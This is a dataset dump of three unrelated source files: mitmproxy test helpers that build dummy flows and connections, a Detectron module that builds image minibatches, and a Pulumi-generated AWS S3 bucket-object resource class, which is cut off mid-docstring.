bool | None | mitmproxy.proxy.protocol.http.HTTPRequest\n @type resp: bool | None | mitmproxy.proxy.protocol.http.HTTPResponse\n @type err: bool | None | mitmproxy.proxy.protocol.primitives.Error\n @return: mitmproxy.proxy.protocol.http.HTTPFlow\n \"\"\"\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if req is True:\n req = tutils.treq()\n if resp is True:\n resp = tutils.tresp()\n if err is True:\n err = terr()\n\n f = http.HTTPFlow(client_conn, server_conn)\n f.request = req\n f.response = resp\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\nclass DummyFlow(flow.Flow):\n \"\"\"A flow that is neither HTTP nor TCP.\"\"\"\n\n def __init__(self, client_conn, server_conn, live=None):\n super().__init__(\"dummy\", client_conn, server_conn, live)\n\n\ndef tdummyflow(client_conn=True, server_conn=True, err=None):\n if client_conn is True:\n client_conn = tclient_conn()\n if server_conn is True:\n server_conn = tserver_conn()\n if err is True:\n err = terr()\n\n f = DummyFlow(client_conn, server_conn)\n f.error = err\n f.reply = controller.DummyReply()\n return f\n\n\ndef tclient_conn() -> context.Client:\n c = context.Client.from_state(dict(\n id=str(uuid.uuid4()),\n address=(\"127.0.0.1\", 22),\n mitmcert=None,\n tls_established=True,\n timestamp_start=946681200,\n timestamp_tls_setup=946681201,\n timestamp_end=946681206,\n sni=\"address\",\n cipher_name=\"cipher\",\n alpn_proto_negotiated=b\"http/1.1\",\n tls_version=\"TLSv1.2\",\n tls_extensions=[(0x00, bytes.fromhex(\"000e00000b6578616d\"))],\n state=0,\n sockname=(\"\", 0),\n error=None,\n tls=False,\n certificate_list=[],\n alpn_offers=[],\n cipher_list=[],\n ))\n c.reply = controller.DummyReply()\n return c\n\n\ndef tserver_conn() -> context.Server:\n c = context.Server.from_state(dict(\n id=str(uuid.uuid4()),\n address=(\"address\", 22),\n source_address=(\"address\", 22),\n ip_address=(\"192.168.0.1\", 22),\n timestamp_start=946681202,\n timestamp_tcp_setup=946681203,\n timestamp_tls_setup=946681204,\n timestamp_end=946681205,\n tls_established=True,\n sni=\"address\",\n alpn_proto_negotiated=None,\n tls_version=\"TLSv1.2\",\n via=None,\n state=0,\n error=None,\n tls=False,\n certificate_list=[],\n alpn_offers=[],\n cipher_name=None,\n cipher_list=[],\n via2=None,\n ))\n c.reply = controller.DummyReply()\n c.rfile = io.BytesIO()\n c.wfile = io.BytesIO()\n return c\n\n\ndef terr(content=\"error\"):\n \"\"\"\n @return: mitmproxy.proxy.protocol.primitives.Error\n \"\"\"\n err = flow.Error(content)\n return err\n"} {"ext": "py", "sha": "1a2f7176ed8951d59e04fb3e3c7f06be6530084a", "content": "# Copyright (c) 2017-present, Facebook, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n#\n# Based on:\n# --------------------------------------------------------\n# Fast R-CNN\n# Copyright (c) 2015 Microsoft\n# Licensed under The MIT License [see LICENSE for details]\n# Written by Ross Girshick\n# --------------------------------------------------------\n\n\"\"\"Construct minibatches for Detectron networks.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport cv2\nimport logging\nimport numpy as np\n\nfrom core.config import cfg,switch_to_teacher,switch_to_student,teacher_cfg\nimport roi_data.fast_rcnn\nimport roi_data.retinanet\nimport roi_data.rpn\nimport utils.blob as blob_utils\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_minibatch_blob_names(is_training=True):\n \"\"\"Return blob names in the order in which they are read by the data loader.\n \"\"\"\n # data blob: holds a batch of N images, each with 3 channels\n blob_names = ['data']\n if cfg.DISTILLATION.DISTILLATION_ON:\n blob_names.append('teacher/data')\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster R-CNN\n blob_names += roi_data.rpn.get_rpn_blob_names(is_training=is_training)\n elif cfg.RETINANET.RETINANET_ON:\n blob_names += roi_data.retinanet.get_retinanet_blob_names(\n is_training=is_training\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n blob_names += roi_data.fast_rcnn.get_fast_rcnn_blob_names(\n is_training=is_training\n )\n return blob_names\n\n\ndef get_minibatch(roidb):\n \"\"\"Given a roidb, construct a minibatch sampled from it.\"\"\"\n # We collect blobs from each image onto a list and then concat them into a\n # single tensor, hence we initialize each blob to an empty list\n blobs = {k: [] for k in get_minibatch_blob_names()}\n # Get the input image blob, formatted for caffe2\n\n im_blob, im_scales = _get_image_blob(roidb)\n if cfg.DISTILLATION.DISTILLATION_ON:\n teacher_cfg.TRAIN.SCALES=cfg.TRAIN.SCALES\n teacher_cfg.TRAIN.MAX_SIZE=cfg.TRAIN.MAX_SIZE\n teacher_blob,_=_get_image_blob(roidb,cfg=teacher_cfg)\n \n blobs['data'] = im_blob\n\n if cfg.DISTILLATION.DISTILLATION_ON:\n blobs['teacher/data']=teacher_blob\n\n if cfg.RPN.RPN_ON:\n # RPN-only or end-to-end Faster/Mask R-CNN\n valid = roi_data.rpn.add_rpn_blobs(blobs, im_scales, roidb)\n elif cfg.RETINANET.RETINANET_ON:\n im_width, im_height = im_blob.shape[3], im_blob.shape[2]\n # im_width, im_height corresponds to the network input: padded image\n # (if needed) width and height. We pass it as input and slice the data\n # accordingly so that we don't need to use SampleAsOp\n valid = roi_data.retinanet.add_retinanet_blobs(\n blobs, im_scales, roidb, im_width, im_height\n )\n else:\n # Fast R-CNN like models trained on precomputed proposals\n valid = roi_data.fast_rcnn.add_fast_rcnn_blobs(blobs, im_scales, roidb)\n \n return blobs, valid\n\n\ndef _get_image_blob(roidb,cfg=cfg):\n \"\"\"Builds an input blob from the images in the roidb at the specified\n scales.\n \"\"\"\n num_images = len(roidb)\n # Sample random scales to use for each image in this batch\n scale_inds = np.random.randint(\n 0, high=len(cfg.TRAIN.SCALES), size=num_images\n )\n processed_ims = []\n im_scales = []\n teacher_ims=[]\n for i in range(num_images):\n im = cv2.imread(roidb[i]['image'])\n assert im is not None, \\\n 'Failed to read image \\'{}\\''.format(roidb[i]['image'])\n if roidb[i]['flipped']:\n im = im[:, ::-1, :]\n\n target_size = cfg.TRAIN.SCALES[scale_inds[i]]\n\n im, im_scale = blob_utils.prep_im_for_blob(\n im, cfg.PIXEL_MEANS,cfg.PIXEL_DIV,cfg.PIXEL_STD, [target_size], cfg.TRAIN.MAX_SIZE\n )\n\n im_scales.append(im_scale[0])\n processed_ims.append(im[0])\n\n # Create a blob to hold the input images\n\n blob = blob_utils.im_list_to_blob(processed_ims)\n\n return blob, im_scales\n"} {"ext": "py", "sha": "1a2f7261fe1537ec542825018acac13320502ca7", "content": "# coding=utf-8\n# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***\n# *** Do not edit by hand unless you're certain you know what you are doing! ***\n\nimport warnings\nimport pulumi\nimport pulumi.runtime\nfrom typing import Any, Mapping, Optional, Sequence, Union, overload\nfrom .. import _utilities\n\n__all__ = ['BucketObjectArgs', 'BucketObject']\n\n@pulumi.input_type\nclass BucketObjectArgs:\n def __init__(__self__, *,\n bucket: pulumi.Input[str],\n acl: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None):\n \"\"\"\n The set of arguments for constructing a BucketObject resource.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param pulumi.Input[bool] force_destroy: Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n :param pulumi.Input[str] key: Name of the object once it is in the bucket.\n :param pulumi.Input[str] kms_key_id: ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] metadata: Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n :param pulumi.Input[str] object_lock_legal_hold_status: [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n :param pulumi.Input[str] object_lock_mode: Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n :param pulumi.Input[str] object_lock_retain_until_date: Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n :param pulumi.Input[str] server_side_encryption: Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n :param pulumi.Input[Union[pulumi.Asset, pulumi.Archive]] source: Path to a file that will be read and uploaded as raw bytes for the object content.\n :param pulumi.Input[str] source_hash: Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n :param pulumi.Input[str] storage_class: [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n :param pulumi.Input[str] website_redirect: Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n if bucket is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"bucket is deprecated: Use the aws_s3_object resource instead\"\"\")\n pulumi.set(__self__, \"bucket\", bucket)\n if acl is not None:\n pulumi.set(__self__, \"acl\", acl)\n if bucket_key_enabled is not None:\n pulumi.set(__self__, \"bucket_key_enabled\", bucket_key_enabled)\n if cache_control is not None:\n pulumi.set(__self__, \"cache_control\", cache_control)\n if content is not None:\n pulumi.set(__self__, \"content\", content)\n if content_base64 is not None:\n pulumi.set(__self__, \"content_base64\", content_base64)\n if content_disposition is not None:\n pulumi.set(__self__, \"content_disposition\", content_disposition)\n if content_encoding is not None:\n pulumi.set(__self__, \"content_encoding\", content_encoding)\n if content_language is not None:\n pulumi.set(__self__, \"content_language\", content_language)\n if content_type is not None:\n pulumi.set(__self__, \"content_type\", content_type)\n if etag is not None:\n pulumi.set(__self__, \"etag\", etag)\n if force_destroy is not None:\n pulumi.set(__self__, \"force_destroy\", force_destroy)\n if key is not None:\n warnings.warn(\"\"\"Use the aws_s3_object resource instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"key is deprecated: Use the aws_s3_object resource instead\"\"\")\n if key is not None:\n pulumi.set(__self__, \"key\", key)\n if kms_key_id is not None:\n pulumi.set(__self__, \"kms_key_id\", kms_key_id)\n if metadata is not None:\n pulumi.set(__self__, \"metadata\", metadata)\n if object_lock_legal_hold_status is not None:\n pulumi.set(__self__, \"object_lock_legal_hold_status\", object_lock_legal_hold_status)\n if object_lock_mode is not None:\n pulumi.set(__self__, \"object_lock_mode\", object_lock_mode)\n if object_lock_retain_until_date is not None:\n pulumi.set(__self__, \"object_lock_retain_until_date\", object_lock_retain_until_date)\n if server_side_encryption is not None:\n pulumi.set(__self__, \"server_side_encryption\", server_side_encryption)\n if source is not None:\n pulumi.set(__self__, \"source\", source)\n if source_hash is not None:\n pulumi.set(__self__, \"source_hash\", source_hash)\n if storage_class is not None:\n pulumi.set(__self__, \"storage_class\", storage_class)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if website_redirect is not None:\n pulumi.set(__self__, \"website_redirect\", website_redirect)\n\n @property\n @pulumi.getter\n def bucket(self) -> pulumi.Input[str]:\n \"\"\"\n Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n \"\"\"\n return pulumi.get(self, \"bucket\")\n\n @bucket.setter\n def bucket(self, value: pulumi.Input[str]):\n pulumi.set(self, \"bucket\", value)\n\n @property\n @pulumi.getter\n def acl(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n \"\"\"\n return pulumi.get(self, \"acl\")\n\n @acl.setter\n def acl(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"acl\", value)\n\n @property\n @pulumi.getter(name=\"bucketKeyEnabled\")\n def bucket_key_enabled(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n \"\"\"\n return pulumi.get(self, \"bucket_key_enabled\")\n\n @bucket_key_enabled.setter\n def bucket_key_enabled(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"bucket_key_enabled\", value)\n\n @property\n @pulumi.getter(name=\"cacheControl\")\n def cache_control(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n \"\"\"\n return pulumi.get(self, \"cache_control\")\n\n @cache_control.setter\n def cache_control(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"cache_control\", value)\n\n @property\n @pulumi.getter\n def content(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n \"\"\"\n return pulumi.get(self, \"content\")\n\n @content.setter\n def content(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content\", value)\n\n @property\n @pulumi.getter(name=\"contentBase64\")\n def content_base64(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n \"\"\"\n return pulumi.get(self, \"content_base64\")\n\n @content_base64.setter\n def content_base64(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_base64\", value)\n\n @property\n @pulumi.getter(name=\"contentDisposition\")\n def content_disposition(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n \"\"\"\n return pulumi.get(self, \"content_disposition\")\n\n @content_disposition.setter\n def content_disposition(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_disposition\", value)\n\n @property\n @pulumi.getter(name=\"contentEncoding\")\n def content_encoding(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n \"\"\"\n return pulumi.get(self, \"content_encoding\")\n\n @content_encoding.setter\n def content_encoding(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_encoding\", value)\n\n @property\n @pulumi.getter(name=\"contentLanguage\")\n def content_language(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Language the content is in e.g., en-US or en-GB.\n \"\"\"\n return pulumi.get(self, \"content_language\")\n\n @content_language.setter\n def content_language(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_language\", value)\n\n @property\n @pulumi.getter(name=\"contentType\")\n def content_type(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n \"\"\"\n return pulumi.get(self, \"content_type\")\n\n @content_type.setter\n def content_type(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"content_type\", value)\n\n @property\n @pulumi.getter\n def etag(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n \"\"\"\n return pulumi.get(self, \"etag\")\n\n @etag.setter\n def etag(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"etag\", value)\n\n @property\n @pulumi.getter(name=\"forceDestroy\")\n def force_destroy(self) -> Optional[pulumi.Input[bool]]:\n \"\"\"\n Whether to allow the object to be deleted by removing any legal hold on any object version. Default is `false`. This value should be set to `true` only if the bucket has S3 object lock enabled.\n \"\"\"\n return pulumi.get(self, \"force_destroy\")\n\n @force_destroy.setter\n def force_destroy(self, value: Optional[pulumi.Input[bool]]):\n pulumi.set(self, \"force_destroy\", value)\n\n @property\n @pulumi.getter\n def key(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Name of the object once it is in the bucket.\n \"\"\"\n return pulumi.get(self, \"key\")\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"key\", value)\n\n @property\n @pulumi.getter(name=\"kmsKeyId\")\n def kms_key_id(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n ARN of the KMS Key to use for object encryption. If the S3 Bucket has server-side encryption enabled, that value will automatically be used. If referencing the `kms.Key` resource, use the `arn` attribute. If referencing the `kms.Alias` data source or resource, use the `target_key_arn` attribute. This provider will only perform drift detection if a configuration value is provided.\n \"\"\"\n return pulumi.get(self, \"kms_key_id\")\n\n @kms_key_id.setter\n def kms_key_id(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"kms_key_id\", value)\n\n @property\n @pulumi.getter\n def metadata(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of keys/values to provision metadata (will be automatically prefixed by `x-amz-meta-`, note that only lowercase label are currently supported by the AWS Go API).\n \"\"\"\n return pulumi.get(self, \"metadata\")\n\n @metadata.setter\n def metadata(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"metadata\", value)\n\n @property\n @pulumi.getter(name=\"objectLockLegalHoldStatus\")\n def object_lock_legal_hold_status(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Legal hold](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-legal-holds) status that you want to apply to the specified object. Valid values are `ON` and `OFF`.\n \"\"\"\n return pulumi.get(self, \"object_lock_legal_hold_status\")\n\n @object_lock_legal_hold_status.setter\n def object_lock_legal_hold_status(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_legal_hold_status\", value)\n\n @property\n @pulumi.getter(name=\"objectLockMode\")\n def object_lock_mode(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Object lock [retention mode](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-modes) that you want to apply to this object. Valid values are `GOVERNANCE` and `COMPLIANCE`.\n \"\"\"\n return pulumi.get(self, \"object_lock_mode\")\n\n @object_lock_mode.setter\n def object_lock_mode(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_mode\", value)\n\n @property\n @pulumi.getter(name=\"objectLockRetainUntilDate\")\n def object_lock_retain_until_date(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Date and time, in [RFC3339 format](https://tools.ietf.org/html/rfc3339#section-5.8), when this object's object lock will [expire](https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html#object-lock-retention-periods).\n \"\"\"\n return pulumi.get(self, \"object_lock_retain_until_date\")\n\n @object_lock_retain_until_date.setter\n def object_lock_retain_until_date(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"object_lock_retain_until_date\", value)\n\n @property\n @pulumi.getter(name=\"serverSideEncryption\")\n def server_side_encryption(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Server-side encryption of the object in S3. Valid values are \"`AES256`\" and \"`aws:kms`\".\n \"\"\"\n return pulumi.get(self, \"server_side_encryption\")\n\n @server_side_encryption.setter\n def server_side_encryption(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"server_side_encryption\", value)\n\n @property\n @pulumi.getter\n def source(self) -> Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]:\n \"\"\"\n Path to a file that will be read and uploaded as raw bytes for the object content.\n \"\"\"\n return pulumi.get(self, \"source\")\n\n @source.setter\n def source(self, value: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]]):\n pulumi.set(self, \"source\", value)\n\n @property\n @pulumi.getter(name=\"sourceHash\")\n def source_hash(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Triggers updates like `etag` but useful to address `etag` encryption limitations. Set using `filemd5(\"path/to/source\")`. (The value is only stored in state and not saved by AWS.)\n \"\"\"\n return pulumi.get(self, \"source_hash\")\n\n @source_hash.setter\n def source_hash(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"source_hash\", value)\n\n @property\n @pulumi.getter(name=\"storageClass\")\n def storage_class(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n [Storage Class](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutObject.html#AmazonS3-PutObject-request-header-StorageClass) for the object. Defaults to \"`STANDARD`\".\n \"\"\"\n return pulumi.get(self, \"storage_class\")\n\n @storage_class.setter\n def storage_class(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"storage_class\", value)\n\n @property\n @pulumi.getter\n def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n \"\"\"\n Map of tags to assign to the object. If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.\n \"\"\"\n return pulumi.get(self, \"tags\")\n\n @tags.setter\n def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):\n pulumi.set(self, \"tags\", value)\n\n @property\n @pulumi.getter(name=\"websiteRedirect\")\n def website_redirect(self) -> Optional[pulumi.Input[str]]:\n \"\"\"\n Target URL for [website redirect](http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html).\n \"\"\"\n return pulumi.get(self, \"website_redirect\")\n\n @website_redirect.setter\n def website_redirect(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, \"website_redirect\", value)\n\n\n@pulumi.input_type\nclass _BucketObjectState:\n def __init__(__self__, *,\n acl: Optional[pulumi.Input[str]] = None,\n bucket: Optional[pulumi.Input[str]] = None,\n bucket_key_enabled: Optional[pulumi.Input[bool]] = None,\n cache_control: Optional[pulumi.Input[str]] = None,\n content: Optional[pulumi.Input[str]] = None,\n content_base64: Optional[pulumi.Input[str]] = None,\n content_disposition: Optional[pulumi.Input[str]] = None,\n content_encoding: Optional[pulumi.Input[str]] = None,\n content_language: Optional[pulumi.Input[str]] = None,\n content_type: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n force_destroy: Optional[pulumi.Input[bool]] = None,\n key: Optional[pulumi.Input[str]] = None,\n kms_key_id: Optional[pulumi.Input[str]] = None,\n metadata: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n object_lock_legal_hold_status: Optional[pulumi.Input[str]] = None,\n object_lock_mode: Optional[pulumi.Input[str]] = None,\n object_lock_retain_until_date: Optional[pulumi.Input[str]] = None,\n server_side_encryption: Optional[pulumi.Input[str]] = None,\n source: Optional[pulumi.Input[Union[pulumi.Asset, pulumi.Archive]]] = None,\n source_hash: Optional[pulumi.Input[str]] = None,\n storage_class: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n website_redirect: Optional[pulumi.Input[str]] = None):\n \"\"\"\n Input properties used for looking up and filtering BucketObject resources.\n :param pulumi.Input[str] acl: [Canned ACL](https://docs.aws.amazon.com/AmazonS3/latest/dev/acl-overview.html#canned-acl) to apply. Valid values are `private`, `public-read`, `public-read-write`, `aws-exec-read`, `authenticated-read`, `bucket-owner-read`, and `bucket-owner-full-control`. Defaults to `private`.\n :param pulumi.Input[str] bucket: Name of the bucket to put the file in. Alternatively, an [S3 access point](https://docs.aws.amazon.com/AmazonS3/latest/dev/using-access-points.html) ARN can be specified.\n :param pulumi.Input[bool] bucket_key_enabled: Whether or not to use [Amazon S3 Bucket Keys](https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-key.html) for SSE-KMS.\n :param pulumi.Input[str] cache_control: Caching behavior along the request/reply chain Read [w3c cache_control](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9) for further details.\n :param pulumi.Input[str] content: Literal string value to use as the object content, which will be uploaded as UTF-8-encoded text.\n :param pulumi.Input[str] content_base64: Base64-encoded data that will be decoded and uploaded as raw bytes for the object content. This allows safely uploading non-UTF8 binary data, but is recommended only for small content such as the result of the `gzipbase64` function with small text strings. For larger objects, use `source` to stream the content from a disk file.\n :param pulumi.Input[str] content_disposition: Presentational information for the object. Read [w3c content_disposition](http://www.w3.org/Protocols/rfc2616/rfc2616-sec19.html#sec19.5.1) for further information.\n :param pulumi.Input[str] content_encoding: Content encodings that have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [w3c content encoding](http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.11) for further information.\n :param pulumi.Input[str] content_language: Language the content is in e.g., en-US or en-GB.\n :param pulumi.Input[str] content_type: Standard MIME type describing the format of the object data, e.g., application/octet-stream. All Valid MIME Types are valid for this input.\n :param pulumi.Input[str] etag: Triggers updates when the value changes. The only meaningful value is `filemd5(\"path/to/file\")`. This attribute is not compatible with KMS encryption, `kms_key_id` or `server_side_encryption = \"aws:kms\"` (see `source_hash` instead).\n :param 